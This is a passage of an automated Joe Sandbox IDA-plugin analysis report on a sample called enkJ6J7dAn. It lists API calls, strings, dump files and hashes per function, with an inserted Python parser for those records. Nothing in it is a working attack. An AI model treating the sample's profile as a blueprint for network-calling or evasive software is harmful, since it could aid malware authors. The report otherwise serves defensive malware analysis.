• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
• Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
• Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memcmp
• String ID: &
• API String ID: 2931989736-1010288
• Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
• Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
• Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
• Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
• Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
• Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
• API String ID: 1921645428-436463671
• Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
• Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
• Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 0045134A
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
• Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
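The per-function records in this part of the report share one fixed layout (an APIs list with call-site refs, an optional Strings list, the memory dump source, and a Similarity block keyed by Opcode ID), and the SendMessageW call sites only show raw uMsg values such as 00001132, 00000143 or 000000B1. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it turns records in this layout into structured objects and resolves those raw message identifiers to their standard Win32 names (TVM_INSERTITEMW, TVM_GETCOUNT, CB_ADDSTRING, CB_SETCURSEL, EM_SETSEL; constants from commctrl.h and winuser.h). The input is a constructed excerpt copied from two of the records on this page with the Associated dump lines left out; the record and field names (ApiCall, FunctionRecord, summarize) are this example's own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two function records copied from the report above,
# indentation stripped and the "Associated" dump lines trimmed for brevity.
SAMPLE = """\
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Memory Dump Source
Similarity
• API ID: MessageSend
• String ID: '
• Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
• Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API bullet: optional "Part of subcall function X: " prefix, Name.MODULE,
# optional "(args)", optional comma, then "ref: <call-site address>".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Standard Win32 window-message constants behind the raw uMsg values in this report.
WIN32_MESSAGES = {
    0x00B1: "EM_SETSEL",
    0x0143: "CB_ADDSTRING",
    0x014E: "CB_SETCURSEL",
    0x1105: "TVM_GETCOUNT",
    0x1132: "TVM_INSERTITEMW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # call-site address
    caller: Optional[int] = None  # set when the call sits inside a subcall

    def message_name(self) -> Optional[str]:
        """For SendMessageW, map the uMsg argument (2nd) to its Win32 name."""
        if self.name == "SendMessageW" and len(self.args) > 1 and self.args[1] != "?":
            return WIN32_MESSAGES.get(int(self.args[1], 16))
        return None


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...


def parse_report(text: str) -> list[FunctionRecord]:
    """Each record starts at an 'APIs' header; bullets belong to the current section."""
    records: list[FunctionRecord] = []
    section = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
        elif line.startswith("• ") and records:
            body, rec = line[2:], records[-1]
            if section == "APIs" and (m := API_RE.match(body)):
                args = m["args"].split(",") if m["args"] is not None else []
                caller = int(m["caller"], 16) if m["caller"] else None
                rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
            elif section == "Similarity":
                key, _, value = body.partition(": ")
                rec.similarity[key] = value
    return records


def summarize(rec: FunctionRecord) -> str:
    """One-line triage view: API ID, then each call site with resolved message names."""
    parts = []
    for call in rec.apis:
        label = f"{call.module}!{call.name}@{call.ref:08X}"
        if msg := call.message_name():
            label += f"[{msg}]"
        parts.append(label)
    return f"{rec.similarity.get('API ID', '?')}: " + ", ".join(parts)
```

Run against the excerpt, `summarize` turns the first record into `MessageSend: USER32!SendMessageW@00448446[TVM_INSERTITEMW], USER32!SendMessageW@0044845F[TVM_GETCOUNT]`, which reads more directly than the raw hex when cross-checking the Combobox and edit records that follow the same pattern. Arguments the sandbox could not resolve are shown as `?` and are left unresolved rather than guessed.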
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: htonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 3832099526-2422070025
                                                                                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InternetOpen
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 2038078732-4266983199
                                                                                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: u,D
                                                                                                                    • API String ID: 4104443479-3858472334
                                                                                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • wsprintfW.USER32 ref: 0045612A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 1262938277-328681919
                                                                                                                    • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                    • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                    APIs
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                    • InternetCloseHandle.WININET ref: 00442668
                                                                                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                    • String ID: aeB
                                                                                                                    • API String ID: 857135153-906807131
